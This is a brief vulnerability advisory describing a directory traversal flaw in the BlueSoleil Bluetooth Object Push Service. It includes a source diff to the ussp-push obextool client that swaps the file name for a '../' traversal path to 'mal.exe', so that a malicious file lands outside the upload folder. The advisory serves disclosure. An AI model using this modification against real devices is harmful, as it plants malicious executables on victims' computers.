|
BlueSoleil Object Push Service Bluetooth File Upload Directory Traversal Vulnerability
This vulnerability has been demonstrated by modifying the obextool.c source file from ussp-push-0.2 as follows: @@ -316,7 +316,7 @@ } filename = argv[1]; - alias = basename(filename); + alias = "../../../../../../../../mal.exe"; str2ba(argv[2], &bdaddr); channel = (argc > 3) ? atoi(argv[3]) : 10; The modified obextool client may then be used to push a malicious file to a target computer. |
|
 Privacy Statement |
